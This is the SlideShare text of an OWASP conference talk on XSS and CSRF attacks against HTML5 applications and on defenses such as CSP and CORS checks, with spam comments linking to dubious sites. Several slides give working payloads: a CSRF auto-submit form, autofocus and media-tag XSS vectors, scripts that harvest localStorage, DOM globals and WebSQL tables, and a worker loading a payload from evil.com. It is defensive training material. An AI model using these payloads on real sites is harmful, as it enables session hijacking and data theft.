Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
XSS & CSRF with HTML5 Attack, Exploit and Defense Shreeraj Shah ...
http://shreeraj.blogspot.com http://shreeraj.blogspot.com ...
HTML5 VECTORS – ATTACKSURFACE OWASP 3
HTML5 – Attacks on the rise …Evolution of HTML5 1991 – HTML started (plain and simple) 1996 – CSS & JavaScript (Welc...
Modern Browser Model Mobile H...
HTML5 Architecture & Threat Model User Interface ...
CSRF WITH HTML5 OWASP 7
CSRF Attack Vector ge Attacker’s ...
SOP bypass and Cookie Replay – Basic Type GET Request IMG SRC <img src="http://host/?command"> SCRIPT...
Streams – name/value pairs are gone … JSON XML ...
CSRF injection – splitting and forcing …<html><body><FORM NAME="buy" ENCTYPE="text/plain"action="http://trade.example.com/...
CSRF with XHR and CORS bypass Mobile ...
XHR – Level 2 powering CSRFXHR object of HTML5 is very powerful Allows interesting features like cross origin request ...
CORS & XHR – ingredients for CSRFBefore HTML5 – Cross Domain was not possible through XHR (SOP applicable)HTML5 – allows...
CORS based HTTP HeadersRequest Origin Access-Control-Request-Method (preflight) Access-Control-Request-Headers (prefli...
XHR – Stealth POST/GETCSRF – powered by CORS and XHR Hence, allow stealth channel and possible silent exploitation ...
Exploiting the use caseCORS preflight bypass – certain Content-Type bypass preflight HTTPForcing cookie replay by “withC...
CSRF with XHR/HTML5 Authentication ...
CSRF with XHR/HTML5 Browser using XHR Call ...
CSRF with XHR/HTML5 ge Attacker’s ...
CSRF & HTML5 OWASP 21
CSRF with XHR/HTML5 ge Attacker’s ...
CSRF & HTML5 OWASP 23
CSRF with XHR/HTML5 Browser is having Form (multi-part) ...
CSRF/Upload - POC OWASP 25
CSRF with XHR/HTML5 ge Attacker’s ...
CSRF/Upload OWASP 27
Internal Scan – not scan but crawl as well … Attacker’s ...
Internal Scan for CORS OWASP 29
Scan and DefendScan and look for Content-Type checking on server side CORS policy scan Form and Upload with tokens ...
XSS WITH HTML5 OWASP 31
XSS with HTML5 (tags, attributes and events) ...
HTML5 – Tags/Attributes/EventsTags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form cont...
XSS variantsMedia tagsExamples <video><source onerror="javascript:alert(1)“> <video onerror="javascript:alert(1)">...
XSS variantsExploiting autofocus <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea a...
XSS variantsForm & Button etc. <form id="test" /><button form="test" formaction="javascript:alert(1)">test <form...
Scan and DefendScan and look for Reflected or Persistent XSS spots with HTML5 tagsDefense and Countermeasures Have i...
CSP in Action – HTML5 defense …Content Security Policy – Defending browser against possible post attack scenarios Base...
Blocking ScriptsContent-Security-Policy: script-src self‘ Only allowing script from the selfOther mechanism unsafe...
Controlling Browserconnect-src – Controlling WebSocket, XHR etc.frame-src – Source of the frame (ClickJacking)object-sr...
Example Persistent XSS injectedHTTP/1.1 200 OKDate: Wed, 12 Sep 2012 14:40:31 GMTServer: Microsoft-IIS/6.0X-Powered-By: A...
Storage extraction with XSS Mobile ...
Web Storage ExtractionBrowser has one place to store data – Cookie (limited and replayed)HTML5 – Storage API provided (L...
Web Storage ExtractionIt is possible to steal them through XSS or via JavaScriptSession hijacking – HttpOnly of no useg...
Blind storage enumerationif(localStorage.length){ console.log(localStorage.length) for(i in localStorage...
File System StorageHTML5 provides virtual file system with filesystem APIs window.requestFileSystem = window.requestFi...
File System StorageIt provides temporary or permanent file system function init() { window.requestFileSystem(wind...
Sensitive information filesystemAssuming app is creating profile on local system ...
Extraction through XSSOnce have an entry point – game over! OWASP ...
Single DOM/One Page App - XSSApplications run with “rich” DOMJavaScript sets several variables and parameters while load...
Blind Enumerationfor(i in window){ obj=window[i]; try{ if(typeof(obj)=="string"){ console.log(i); ...
Global Sensitive Information Extraction from DOMHTML5 apps running on Single DOMHaving several key global variables, obj...
Global Sensitive Information Extraction from DOMfor(i in window){ obj=window[i]; if(obj!=null||obj!=undefined) var ...
Scan and DefendScan and look for Scanning storageDefense and Countermeasures Do not store sensitive information on l...
SQLi & Blind Enumeration through XSS M...
SQL InjectionWebSQL is part of HTML 5 specification, it provides SQL database to the browser itself.Allows one time data...
SQL InjectionThrough JavaScript one can harvest entire local database.Example ...
Blind WebSQL Enumerationvar dbo;var table;var usertable;for(i in window){ obj = window[i]; try{ ...
Blind WebSQL EnumerationWe will run through all objects and get object where constructor is “Database”We will make Selec...
Blind WebSQL Enumeration OWASP 60
Web Messaging and Worker Injection Mob...
Web Messaging HTML5 is having new interframe communication system called Web Messaging. By postMessage() call parent fr...
Web Messaging - ScenarioIf postMessage() is set to * so page can be loaded in iframe and messaging can be hijackedAlso, ...
Origin check OWASP 64
Web Worker – Hacks!Web Workers allows threading into HTML pages using JavaScriptNo need to use JavaScript calls like set...
Web Worker – Hacks! Web Page ...
Web Worker – Hacks!Security issues It is not allowing to load cross domain worker scripts. (http:, https:,javascript:...
Web Worker – Hacks! Exmaple<html><button onclick="Read()">Read Last Message</button><button onclick="stop()">Stop</button...
Web Workers – Hacks!Possible to cause XSS Running script Passing hidden payloadAlso, web workers can help in embed...
Scan and DefendScan and look for JavaScript scanning Messaging and Worker implementation DOM calls Use of eval(),...
APIs …HTML5 few other APIs are interesting from security standpoint File APIs – allows local file access and can mixed...
Resources/Referenceshttp://www.html5rocks.com/en/ (Solid stuff)https://www.owasp.org/index.php/HTML5_Security _Cheat_She...
http://shreeraj.blogspot.com http://shreeraj.blogspot.com shreeraj@blueinfy.com ...
Upcoming SlideShare
Loading in …5
×

XSS and CSRF with HTML5

39,446 views

Published on

Published in: Technology
no profile picture user
  • ➤➤ How Long Does She Want You to Last? Here's the link to the FREE report ♣♣♣ http://ishbv.com/rockhardx/pdf
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • ★★ How Long Does She Want You to Last? ★★ A recent study proved that the average man lasts just 2-5 minutes in bed (during intercourse). The study also showed that many women need at least 7-10 minutes of intercourse to reach "The Big O" - and, worse still... 30% of women never get there during intercourse. Clearly, most men are NOT fulfilling there women's needs in bed. Now, as I've said many times - how long you can last is no guarantee of being a GREAT LOVER. But, not being able to last 20, 30 minutes or more, is definitely a sign that you're not going to "set your woman's world on fire" between the sheets. Question is: "What can you do to last longer?" Well, one of the best recommendations I can give you today is to read THIS report. In it, you'll discover a detailed guide to an Ancient Taoist Thrusting Technique that can help any man to last much longer in bed. I can vouch 100% for the technique because my husband has been using it for years :) Here's the link to the report ♥♥♥ https://tinyurl.com/rockhardxxx
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • ★★ How Long Does She Want You to Last? ★★ A recent study proved that the average man lasts just 2-5 minutes in bed (during intercourse). The study also showed that many women need at least 7-10 minutes of intercourse to reach "The Big O" - and, worse still... 30% of women never get there during intercourse. Clearly, most men are NOT fulfilling there women's needs in bed. Now, as I've said many times - how long you can last is no guarantee of being a GREAT LOVER. But, not being able to last 20, 30 minutes or more, is definitely a sign that you're not going to "set your woman's world on fire" between the sheets. Question is: "What can you do to last longer?" Well, one of the best recommendations I can give you today is to read THIS report. In it, you'll discover a detailed guide to an Ancient Taoist Thrusting Technique that can help any man to last much longer in bed. I can vouch 100% for the technique because my husband has been using it for years :) Here's the link to the report  http://ishbv.com/rockhardx/pdf
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • ♣♣ 10 Easy Ways to Improve Your Performance in Bed... ➤➤ http://ishbv.com/rockhardx/pdf
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • thanks for sharing
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
Show More
Show More

XSS and CSRF with HTML5

  1. XSS & CSRF with HTML5 Attack, Exploit and Defense Shreeraj Shah Blueinfy Solutions Pvt. Ltd. shreeraj.shah@blueinfy.netOWASPOWASP AppSecUSA 2012 Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
  2. http://shreeraj.blogspot.com http://shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http://www.blueinfy.com Who Am I? http://www.blueinfy.com Twitter --@shreeraj Twitter @shreeraj Founder & Director  Blueinfy & iAppSecure Solutions Pvt. Ltd. Past experience  Net Square (Founder), Foundstone (R&D/Consulting), Chase(Middleware), IBM (Domino Dev) Interest  Web security research Published research  Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc.  Tools – DOMScan, DOMTracer, wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.  Advisories - .Net, Java servers etc.  Presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan, DeepSec etc. Books (Author)  Web 2.0 Security – Defending Ajax, RIA and SOA  Hacking Web Services  Web Hacking OWASP 2
  3. HTML5 VECTORS – ATTACKSURFACE OWASP 3
  4. HTML5 – Attacks on the rise …Evolution of HTML5 1991 – HTML started (plain and simple) 1996 – CSS & JavaScript (Welcome to world of XSS and browser security) 2000 – XHTML1 (Growing concerns and attacks on browsers) 2005 – AJAX, XHR, DOM – (Attack cocktail and surface expansion) 2009 – HTML5 (Here we go… new surface, architecture and defense) – HTML+CSS+JS OWASP 4
  5. Modern Browser Model Mobile HTML5 + CSS Silverlight FlashAPI (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage FileSystem XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS/Content-Sec Sandbox Core Policies OWASP 5
  6. HTML5 Architecture & Threat Model User Interface Cross Domain Application Sandbox (Origin – Policy ) HTML/CSSSingle JavaScript InternetDOM/PageApplication XHR Target DOM WebSockets Application Native Storage, WebSQL, IndexedDB Messaging APIs Geolocation and other FileSystem, Cache - APIs APIs OWASP 6
  7. CSRF WITH HTML5 OWASP 7
  8. CSRF Attack Vector ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At CSRF Attack – with session Login Success – cookie set Success Web Store Database Client/Victim Application Server Browser Server Successful exploitation … •SOP bypass •Cookie Replay OWASP 8
  9. SOP bypass and Cookie Replay – Basic Type GET Request IMG SRC <img src="http://host/?command"> SCRIPT SRC <script src="http://host/?command"> IFRAME SRC <iframe src="http://host/?command"> POST Request <script type="text/javascript" language="JavaScript"> document.foo.submit(); </script> OWASP 9
  10. Streams – name/value pairs are gone … JSON XML JS-Script JS-Object JS-Array OWASP 10
  11. CSRF injection – splitting and forcing …<html><body><FORM NAME="buy" ENCTYPE="text/plain"action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST"> <input type="hidden" name=<?xml version value="1.0"?><methodCall><methodName>stocks.buy</methodName><params><param><value><string>MSFT</string></value></param><param><value><double>26</double></value></param></params></methodCall>></FORM><script>document.buy.submit();</script></body></html> OWASP 11
  12. CSRF with XHR and CORS bypass Mobile HTML5 + CSS Silverlight FlashAPI (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 12
  13. XHR – Level 2 powering CSRFXHR object of HTML5 is very powerful Allows interesting features like cross origin request and binary upload/downloadxhr.responseType can be set to "text", "arraybuffer", "document“ and "blob“Also, for posting data stream - DOMString, Document, FormData, Blob, File, ArrayBuffer etc… OWASP 13
  14. CORS & XHR – ingredients for CSRFBefore HTML5 – Cross Domain was not possible through XHR (SOP applicable)HTML5 – allows cross origin calls with XHR-Level 2 callsCORS – Cross Origin Resource Sharing needs to be followed (Option/Preflight calls)Adding extra HTTP header (Access-Control-Allow- Origin and few others) OWASP 14
  15. CORS based HTTP HeadersRequest Origin Access-Control-Request-Method (preflight) Access-Control-Request-Headers (preflight)Response Access-Control-Allow-Origin Access-Control-Allow-Credentials Access-Control-Allow-Expose-Headers Access-Control-Allow-Max-Age (preflight) Access-Control-Allow-Allow-Methods (preflight) Access-Control-Allow-Allow-Headers (preflight) OWASP 15
  16. XHR – Stealth POST/GETCSRF – powered by CORS and XHR Hence, allow stealth channel and possible silent exploitation One way CSRF with any stream since XHR allows raw stream from browser (XML, JSON, Binary as well) Two way CSRF (POST and read both – in case of allow set to *) OWASP 16
  17. Exploiting the use caseCORS preflight bypass – certain Content-Type bypass preflight HTTPForcing cookie replay by “withCredentials”Internal network scanning and tunnelingInformation harvesting (internal crawling)Stealth browser shell – post XSS (Allow origin- *)Business functionality abuse (upload and binary streams) OWASP 17
  18. CSRF with XHR/HTML5 Authentication User Server establishing Session Login request (HTTPS) Session cookie Web Store Database Client/Victim Application Server Browser Server OWASP 18
  19. CSRF with XHR/HTML5 Browser using XHR Call Authentication JavaScript User making Server a buy over HTTP Placing an order (JSON services) Success Web Store Database Client/Victim Application Server Browser Server OWASP 19
  20. CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Session is Authentication ke c nd Server tta r se a d still live – not it A ke ylo Vis t ac pa yet logged At out Web Store Database Client/Victim Application Server Browser Server Leveraging XHR Call • Content-type to avoid pre flight • “withCredentials” set to true OWASP 20
  21. CSRF & HTML5 OWASP 21
  22. CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At XHR initiates HTTP buy request Success – cookie replayed Web Store Database Client/Victim Application Server Browser Server Hence, • Without victim’s consent or notice Got it • Stealth HTTP request generated • Silent Exploitation takes place OWASP 22
  23. CSRF & HTML5 OWASP 23
  24. CSRF with XHR/HTML5 Browser is having Form (multi-part) Business Authentication Server layer function of uploading Uploading bulk orders Success Web Store Database Client/Victim Application Server Browser Server OWASP 24
  25. CSRF/Upload - POC OWASP 25
  26. CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At XHR initiates HTTP multi-part - Upload Success – cookie replayed Web Store Database Client/Victim Application Server Browser Server Hence, • Without victim’s consent or notice Got it • Stealth HTTP Upload takes place • Silent Exploitation… OWASP 26
  27. CSRF/Upload OWASP 27
  28. Internal Scan – not scan but crawl as well … Attacker’s Site Internet Internet CSRF Payload And stealth channel Client/Victim Intranet Intranet Browser Internal Web Internal HR Internal Web/App Mail Application Server OWASP 28
  29. Internal Scan for CORS OWASP 29
  30. Scan and DefendScan and look for Content-Type checking on server side CORS policy scan Form and Upload with tokens or notDefense and Countermeasures Secure libraries for streaming HTML5/Web 2.0 content CSRF protections Stronger CORS implementation OWASP 30
  31. XSS WITH HTML5 OWASP 31
  32. XSS with HTML5 (tags, attributes and events) Mobile HTML5 + CSS Silverlight FlashAPI (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 32
  33. HTML5 – Tags/Attributes/EventsTags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form control (keys)Attributes – form, submit, autofocus, sandbox, manifest, rel etc.Events/Objects – Navigation (_self), Editable content, Drag-Drop APIs, pushState (History) etc. OWASP 33
  34. XSS variantsMedia tagsExamples <video><source onerror="javascript:alert(1)“> <video onerror="javascript:alert(1)"><source> OWASP 34
  35. XSS variantsExploiting autofocus <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> OWASP 35
  36. XSS variantsForm & Button etc. <form id="test" /><button form="test" formaction="javascript:alert(1)">test <form><button formaction="javascript:alert(1)">testEtc … and more … Nice HTML5 XSS cheat sheet (http://html5sec.org/) OWASP 36
  37. Scan and DefendScan and look for Reflected or Persistent XSS spots with HTML5 tagsDefense and Countermeasures Have it added on your blacklist Standard XSS protections by encoding OWASP 37
  38. CSP in Action – HTML5 defense …Content Security Policy – Defending browser against possible post attack scenarios Based on Origin (SOP the key) Allows whitelisting mechanism for what “to do” and “not to do” It is possible to send back notification to application when violation takes place Implementation by extra HTTP headers [Brower to browser X-WebKit-CSP (S/C) X-Content-Security-Policy (F)] OWASP 38
  39. Blocking ScriptsContent-Security-Policy: script-src self‘ Only allowing script from the selfOther mechanism unsafe-inline - blocking inline unsafe-eval‘ – blocking eval type callsPost XSS defense can be crafted OWASP 39
  40. Controlling Browserconnect-src – Controlling WebSocket, XHR etc.frame-src – Source of the frame (ClickJacking)object-src – Flash, Silverlight etc.media-src – controlling audio and videoimg/style – image and style sourcesdefault-src https:; - locking over SSL only OWASP 40
  41. Example Persistent XSS injectedHTTP/1.1 200 OKDate: Wed, 12 Sep 2012 14:40:31 GMTServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETX-WebKit-CSP: script-src selfX-AspNet-Version: 2.0.50727Cache-Control: privateContent-Type: text/html; charset=utf-8Content-Length: 6146 OWASP 41
  42. Storage extraction with XSS Mobile HTML5 + CSS Silverlight FlashAPI (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 42
  43. Web Storage ExtractionBrowser has one place to store data – Cookie (limited and replayed)HTML5 – Storage API provided (Local and Session)Can hold global scoped variableshttp://www.w3.org/TR/webstorage/ OWASP 43
  44. Web Storage ExtractionIt is possible to steal them through XSS or via JavaScriptSession hijacking – HttpOnly of no usegetItem and setItem callsXSS the box and scan through storage OWASP 44
  45. Blind storage enumerationif(localStorage.length){ console.log(localStorage.length) for(i in localStorage){ console.log(i) console.log(localStorage.getItem(i)); }}Above code allows all storage variable extraction OWASP 45
  46. File System StorageHTML5 provides virtual file system with filesystem APIs window.requestFileSystem = window.requestFileSystem || window.webkitRequestFileSystem;It becomes a full blown local system for application in sandboxIt empowers application OWASP 46
  47. File System StorageIt provides temporary or permanent file system function init() { window.requestFileSystem(window.TEMPORARY, 1024*1024, function(filesystem) { filesys = filesystem; }, catcherror); } App can have full filesystem in place now. OWASP 47
  48. Sensitive information filesystemAssuming app is creating profile on local system OWASP 48
  49. Extraction through XSSOnce have an entry point – game over! OWASP 49
  50. Single DOM/One Page App - XSSApplications run with “rich” DOMJavaScript sets several variables and parameters while loading – GLOBALSIt has sensitive information and what if they are GLOBAL and remains during the life of applicationIt can be retrieved with XSSHTTP request and response are going through JavaScripts (XHR) – what about those vars? OWASP 50
  51. Blind Enumerationfor(i in window){ obj=window[i]; try{ if(typeof(obj)=="string"){ console.log(i); console.log(obj.toString()); } }catch(ex){}} OWASP 51
  52. Global Sensitive Information Extraction from DOMHTML5 apps running on Single DOMHaving several key global variables, objects and array var arrayGlobals = [my@email.com,"12141hewvsdr9321343423mjfdvint","t est.com"];Post DOM based exploitation possible and harvesting all these values. OWASP 52
  53. Global Sensitive Information Extraction from DOMfor(i in window){ obj=window[i]; if(obj!=null||obj!=undefined) var type = typeof(obj); if(type=="object"||type=="string") { console.log("Name:"+i) try{ my=JSON.stringify(obj); console.log(my) }catch(ex){} }} OWASP 53
  54. Scan and DefendScan and look for Scanning storageDefense and Countermeasures Do not store sensitive information on localStorage and Globals XSS protection OWASP 54
  55. SQLi & Blind Enumeration through XSS Mobile HTML5 + CSS Silverlight FlashAPI (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 55
  56. SQL InjectionWebSQL is part of HTML 5 specification, it provides SQL database to the browser itself.Allows one time data loading and offline browsing capabilities.Causes security concern and potential injection points.Methods and calls are possible OWASP 56
  57. SQL InjectionThrough JavaScript one can harvest entire local database.Example OWASP 57
  58. Blind WebSQL Enumerationvar dbo;var table;var usertable;for(i in window){ obj = window[i]; try{ if(obj.constructor.name=="Database"){ dbo = obj; obj.transaction(function(tx){ tx.executeSql(SELECT name FROM sqlite_master WHERE type=table, [],function(tx,results){ table=results; },null); }); } }catch(ex){}}if(table.rows.length>1) usertable=table.rows.item(1).name; OWASP 58
  59. Blind WebSQL EnumerationWe will run through all objects and get object where constructor is “Database”We will make Select query directly to sqlite_master databaseWe will grab 1st table leaving webkit table on 0th entry OWASP 59
  60. Blind WebSQL Enumeration OWASP 60
  61. Web Messaging and Worker Injection Mobile HTML5 + CSS Silverlight FlashAPI (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 61
  62. Web Messaging HTML5 is having new interframe communication system called Web Messaging. By postMessage() call parent frame/domain can call with the iframe Iframe can be loaded on cross domain. Hence, create issues – data/information validation & data leakage by cross posting possible worker.webkitPostMessage – faster transferable objects OWASP 62
  63. Web Messaging - ScenarioIf postMessage() is set to * so page can be loaded in iframe and messaging can be hijackedAlso, origin is not set to fixed then again frame listen from any domian – again an issueStream coming needs to be checked before innerHTML or eval()Iframe or Web Worker can glue two streams – same domain or cross domain OWASP 63
  64. Origin check OWASP 64
  65. Web Worker – Hacks!Web Workers allows threading into HTML pages using JavaScriptNo need to use JavaScript calls like setTimeout(), setInterval(), XMLHttpRequest, and event handlersTotally Async and well supported [initialize] var worker = new Worker(task.js); [Messaging] worker.postMessage(); OWASP 65
  66. Web Worker – Hacks! Web Page Current DOM Web Worker XHR, Location, Navigator etc. JavaScript Runtime Browser Platform Background Thread on same Scope and Object – No DOM Access page - messaging Regex, Array, JSON etc… OWASP 66
  67. Web Worker – Hacks!Security issues It is not allowing to load cross domain worker scripts. (http:, https:,javascript:,data : -No) It has some typical issues  It allows the use of XHR. Hence, in-domain and CORS requests possible  It can cause DoS – if user get stream to run JavaScript in worker thread. Don’t have access to parent DOM though  Message validation needed – else DOM based XSS OWASP 67
  68. Web Worker – Hacks! Exmaple<html><button onclick="Read()">Read Last Message</button><button onclick="stop()">Stop</button><output id="result"></output><script> function Read() { worker.postMessage({cmd: read, msg: last}); } function stop() { worker.postMessage({cmd: stop, msg: stop it}); alert("Worker stopped"); } var worker = new Worker(message.js); worker.addEventListener(message, function(e) { document.getElementById(result).innerHTML = e.data; }, false);</script></html> OWASP 68
  69. Web Workers – Hacks!Possible to cause XSS Running script Passing hidden payloadAlso, web workers can help in embedding silent running js file and can be controlled.Can be a tool for payload delivery and control within browser frameworkimportScripts("http://evil.com/payload.js") – worker can run cross domain script OWASP 69
  70. Scan and DefendScan and look for JavaScript scanning Messaging and Worker implementation DOM calls Use of eval(), document.* calls etc.Defense and Countermeasures Same origin listening is a must for messaging event Secure JavaScript coding OWASP 70
  71. APIs …HTML5 few other APIs are interesting from security standpoint File APIs – allows local file access and can mixed with ClickJacking and other attacks to gain client files. Drag-Drop APIs – exploiting self XSS and few other tricks, hijacking cookies …  Lot more to explore and defend… OWASP 71
  72. Resources/Referenceshttp://www.html5rocks.com/en/ (Solid stuff)https://www.owasp.org/index.php/HTML5_Security _Cheat_Sheet (OWASP stuff)http://html5sec.org/ (Quick Cheat sheet)http://html5security.org/ (Good resources)http://blog.kotowicz.net/ (Interesting work) OWASP 72
  73. http://shreeraj.blogspot.com http://shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http://www.blueinfy.com http://www.blueinfy.comCONCLUSION AND QUESTIONS OWASP 73

×